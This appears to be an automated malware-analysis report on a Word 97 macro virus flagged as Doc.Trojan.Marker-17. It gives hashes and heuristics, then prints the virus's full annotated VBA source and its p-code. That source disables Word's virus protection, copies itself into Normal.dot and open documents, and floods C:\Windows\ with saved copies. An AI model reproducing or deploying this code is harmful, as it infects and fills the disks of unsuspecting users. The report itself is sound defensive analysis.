Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ff41b3a99a046b7…

MALICIOUS

Office (OLE)

30.5 KB Created: 2001-05-10 22:20:00 Authoring application: Microsoft Word 8.0 First seen: 2014-04-29
MD5: db144e6e1912111fe6c2ba1dfd4a3969 SHA-1: f3a82ee2e6c903e8bc3aacce7311d7cb3c8993ce SHA-256: 6ff41b3a99a046b743db9262d0d97f47cbc520840a3423535518ecf901a05799
220 Risk Score

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-17
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          Options.VirusProtection = False
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10392 bytes
SHA-256: 1cd95080a8cecdcd7309c4072fc7a4ececd4f331d0768134213e66f9c5e7dc13
Detection
ClamAV: Doc.Trojan.Marker-17
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module attributes of the ThisDocument class module as decoded by olevba.
' VB_TemplateDerived = True and VB_Base = "1Normal.ThisDocument" indicate the
' module was derived from a template (apparently Normal), which fits the
' global-template replication performed in Document_Close below.
' The dated comment lines that follow (name, initials, an empty address line,
' timestamp -- repeated four times) have the same layout as the stamp that
' Document_Close prepends to each copy it makes, i.e. they are traces of
' earlier hosts this sample passed through.
' Shane Coursen
' SC
'
' 5/17/01 11:04:33 AM
'
' Shane Coursen
' SC
'
' 5/17/01 11:04:20 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:19:11 AM
'
' Shane Coursen
' SC
'
' 1/24/2001 10:18:58 AM
'
Private Sub Document_Close()
  ' Auto-macro: Word runs this when the document is closed.
  ' Two stages: (1) copy this module between the open document and the
  ' global template Normal.dot through the VBE object model, (2) from
  ' July 2000 onward, repeatedly SaveAs the document under new names in
  ' C:\Windows\. Detection-relevant indicators visible below: the marker
  ' string "la macro de colombia", VBProject/VBComponents/CodeModule access,
  ' the Options.VirusProtection = False write, and the unbounded SaveAs loop.
  
  ' Every runtime error (e.g. VBProject access being denied) is swallowed,
  ' so failures are silent and execution simply continues.
  On Error Resume Next
  ' Replication only runs when the host is saved as .doc or .dot.
  If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
      ' Infection marker: its presence in a code module means "already infected".
      Const exi = "la macro de colombia"
      ' VBA types only the last name in each Dim list, so DInfec, Docu,
      ' modulin and contemodu are Variant. planinfec is declared but never
      ' used: the code below reads and writes the undeclared name Plainfec.
      Dim DInfec, planinfec As Boolean
      Dim Docu, Plan As Object
      Dim modulin, contemodu, Ninfec As String
      Dim Nume As Integer
      Dim Copform As Object
   
      ' First VBComponent of the active document and of Normal.dot: the two
      ' code modules whose text is copied back and forth.
      Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
      Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
      
      ' Saved flags captured before modification; only SaveDoc is read later.
      SaveDoc = ActiveDocument.Saved
      Saveplan = NormalTemplate.Saved
   
      ' Infection state of each side: Find searches lines 1..40000 for the marker.
      DInfec = Docu.codemodule.Find(exi, 1, 1, 40000, 40000)
      Plainfec = Plan.codemodule.Find(exi, 1, 1, 40000, 40000)

      ' Generation stamp prepended on each copy: four comment lines holding the
      ' user name, initials, address and current time (the header of this
      ' module carries four such stamps from earlier hosts). Note that this
      ' writes host identity data into the document itself.
      Ninfec = "'" & " " & Application.UserName & Chr(13) & "'" & " " & Application.UserInitials & Chr(13) & "'" & " " & Application.UserAddress & Chr(13) & "'" & " " & Now() & Chr(13) & "'" & " "
      
      ' Turns off Word's macro-virus warning. This is the line the report's
      ' OLE_VBA_MACRO_VIRUS_REPLICATION heuristic matched.
      Options.VirusProtection = False
   
      ' Random gate: Nume is a single digit 0-9 (first character of
      ' Int(Rnd()*10)); replication proceeds when it equals 7 or when
      ' Normal.dot is not yet infected.
      Nume = Mid(Int(Rnd() * 10), 1, 1)
      Nume = Nume
      nume1 = 7
      If Nume = nume1 Or Plainfec = False Then
         
         ' Document infected, template clean: stamp the document module and
         ' append its entire text to Normal.dot's module.
         If DInfec = True And Plainfec = False Then
            Docu.codemodule.addfromstring Ninfec
            contemodu = Docu.codemodule.Lines(1, Docu.codemodule.CountOfLines)
            Plan.codemodule.addfromstring contemodu
         End If

         ' Template infected, document clean: same copy in the other direction.
         If DInfec = False And Plainfec = True Then
            Plan.codemodule.addfromstring Ninfec
            contemodu = Plan.codemodule.Lines(1, Plan.codemodule.CountOfLines)
            Docu.codemodule.addfromstring contemodu
         End If
         
         
      
         ' Persist both sides; each save is gated on SaveDoc (Saveplan is never read).
         If SaveDoc = True Then ThisDocument.Save
         If SaveDoc = True Then NormalTemplate.Save
      End If
  End If
    ' Date string built and trimmed but not used afterwards.
    sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
  sd = Trim(sd)
  ' Payload trigger: any year >= 2000 with month July-December.
  If Year(Now()) >= 2000 And Month(Now()) > 6 Then
    ChangeFileOpenDirectory "C:\Windows\"
    ' Saves the document as AA<i>AA.DOC up to 999,999,991 times, i.e. keeps
    ' writing files into C:\Windows\ until interrupted or the disk is exhausted.
    For i = 1 To 999999991
        ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
        wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
    Next
  End If

End Sub


















































' Processing file: /opt/analyzer/scan_staging/466b63f722bf4b708222d1b2a3cb5c3b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5466 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #1:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #2:
' 	QuoteRem 0x0000 0x0000 ""
' Line #3:
' 	QuoteRem 0x0000 0x0014 " 5/17/01 11:04:33 AM"
' Line #4:
' 	QuoteRem 0x0000 0x0000 ""
' Line #5:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #6:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #7:
' 	QuoteRem 0x0000 0x0000 ""
' Line #8:
' 	QuoteRem 0x0000 0x0014 " 5/17/01 11:04:20 AM"
' Line #9:
' 	QuoteRem 0x0000 0x0000 ""
' Line #10:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #11:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #12:
' 	QuoteRem 0x0000 0x0000 ""
' Line #13:
' 	QuoteRem 0x0000 0x0016 " 1/24/2001 10:19:11 AM"
' Line #14:
' 	QuoteRem 0x0000 0x0000 ""
' Line #15:
' 	QuoteRem 0x0000 0x000E " Shane Coursen"
' Line #16:
' 	QuoteRem 0x0000 0x0003 " SC"
' Line #17:
' 	QuoteRem 0x0000 0x0000 ""
' Line #18:
' 	QuoteRem 0x0000 0x0016 " 1/24/2001 10:18:58 AM"
' Line #19:
' 	QuoteRem 0x0000 0x0000 ""
' Line #20:
' 	FuncDefn (Private Sub Document_Close())
' Line #21:
' Line #22:
' 	OnError (Resume Next) 
' Line #23:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #24:
' 	Dim (Const) 
' 	LitStr 0x0014 "la macro de colombia"
' 	VarDefn exi
' Line #25:
' 	Dim 
' 	VarDefn DInfec
' 	VarDefn planinfec (As Boolean)
' Line #26:
' 	Dim 
' 	VarDefn Docu
' 	VarDefn Plan (As Object)
' Line #27:
' 	Dim 
' 	VarDefn modulin
' 	VarDefn contemodu
' 	VarDefn Ninfec (As String)
' Line #28:
' 	Dim 
' 	VarDefn Nume (As Integer)
' Line #29:
' 	Dim 
' 	VarDefn Copform (As Object)
' Line #30:
' Line #31:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set Docu 
' Line #32:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set Plan 
' Line #33:
' Line #34:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	St SaveDoc 
' Line #35:
' 	Ld NormalTemplate 
' 	MemLd Saved 
' 	St Saveplan 
' Line #36:
' Line #37:
' 	Ld exi 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x9C40 0x0000 
' 	LitDI4 0x9C40 0x0000 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	St DInfec 
' Line #38:
' 	Ld exi 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI4 0x9C40 0x0000 
' 	LitDI4 0x9C40 0x0000 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemLd Find 0x0005 
' 	St Plainfec 
' Line #39:
' Line #40:
' 	LitStr 0x0001 "'"
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld Application 
' 	MemLd UserName 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld Application 
' 	MemLd UserInitials 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	Ld Application 
' 	MemLd UserAddress 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	ArgsLd Now 0x0000 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0001 "'"
' 	Concat 
' 	LitStr 0x0001 " "
' 	Concat 
' 	St Ninfec 
' Line #41:
' Line #42:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #43:
' Line #44:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	St Nume 
' Line #45:
' 	Ld Nume 
' 	St Nume 
' Line #46:
' 	LitDI2 0x0007 
' 	St nume1 
' Line #47:
' 	Ld Nume 
' 	Ld nume1 
' 	Eq 
' 	Ld Plainfec 
' 	LitVarSpecial (False)
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #48:
' Line #49:
' 	Ld DInfec 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld Plainfec 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	IfBlock 
' Line #50:
' 	Ld Ninfec 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #51:
' 	LitDI2 0x0001 
' 	Ld Docu 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	St contemodu 
' Line #52:
' 	Ld contemodu 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #53:
' 	EndIfBlock 
' Line #54:
' Line #55:
' 	Ld DInfec 
' 	LitVarSpecial (False)
' 	Eq 
' 	Ld Plainfec 
' 	LitVarSpecial (True)
' 	Eq 
' 	And 
' 	IfBlock 
' Line #56:
' 	Ld Ninfec 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #57:
' 	LitDI2 0x0001 
' 	Ld Plan 
' 	MemLd codemodule 
' 	MemLd CountOfLines 
' 	Ld Plan 
' 	MemLd codemodule 
' 	ArgsMemLd Lines 0x0002 
' 	St contemodu 
' Line #58:
' 	Ld contemodu 
' 	Ld Docu 
' 	MemLd codemodule 
' 	ArgsMemCall addfromstring 0x0001 
' Line #59:
' 	EndIfBlock 
' Line #60:
' Line #61:
' Line #62:
' Line #63:
' 	Ld SaveDoc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ThisDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #64:
' 	Ld SaveDoc 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #65:
' 	EndIfBlock 
' Line #66:
' 	EndIfBlock 
' Line #67:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitStr 0x0001 "-"
' 	Concat 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	Concat 
' 	LitStr 0x0001 "-"
' 	Concat 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Year 0x0001 
' 	Concat 
' 	St sd 
' Line #68:
' 	Ld sd 
' 	ArgsLd Trim 0x0001 
' 	St sd 
' Line #69:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Year 0x0001 
' 	LitDI2 0x07D0 
' 	Ge 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x0006 
' 	Gt 
' 	And 
' 	IfBlock 
' Line #70:
' 	LitStr 0x000B "C:\Windows\"
' 	ArgsCall ChangeFileOpenDirectory 0x0001 
' Line #71:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI4 0xC9F7 0x3B9A 
' 	For 
' Line #72:
' 	LineCont 0x0010 0F 00 08 00 1B 00 08 00 27 00 08 00 31 00 08 00
' 	LitStr 0x0002 "AA"
' 	Ld i 
' 	Concat 
' 	LitStr 0x0006 "AA.DOC"
' 	Concat 
' 	Paren 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	LitVarSpecial (False)
' 	ParamNamed LockComments 
' 	LitStr 0x0000 ""
' 	ParamNamed Password 
' 	LitVarSpecial (True)
' 	ParamNamed AddToRecentFiles 
' 	LitStr 0x0000 ""
' 	ParamNamed WritePassword 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnlyRecommended 
' 	LitVarSpecial (False)
' 	ParamNamed EmbedTrueTypeFonts 
' 	LitVarSpecial (False)
' 	ParamNamed SaveNativePictureFormat 
' 	LitVarSpecial (False)
' 	ParamNamed SaveFormsData 
' 	LitVarSpecial (False)
' 	ParamNamed SaveAsAOCELetter 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x000B 
' Line #73:
' 	StartForVariable 
' 	Next 
' Line #74:
' 	EndIfBlock 
' Line #75:
' Line #76:
' 	EndSub 
' Line #77:
' Line #78:
' Line #79:
' Line #80:
' Line #81:
' Line #82:
' Line #83:
' Line #84:
' Line #85:
' Line #86:
' Line #87:
' Line #88:
' Line #89:
' Line #90:
' Line #91:
' Line #92:
' Line #93:
' Line #94:
' Line #95:
' Line #96:
' Line #97:
' Line #98:
' Line #99:
' Line #100:
' Line #101:
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' Line #106:
' Line #107:
' Line #108:
' Line #109:
' Line #110:
' Line #111:
' Line #112:
' Line #113:
' Line #114:
' Line #115:
' Line #116:
' Line #117:
' Line #118:
' Line #119:
' Line #120:
' Line #121:
' Line #122:
' Line #123:
' Line #124:
' Line #125: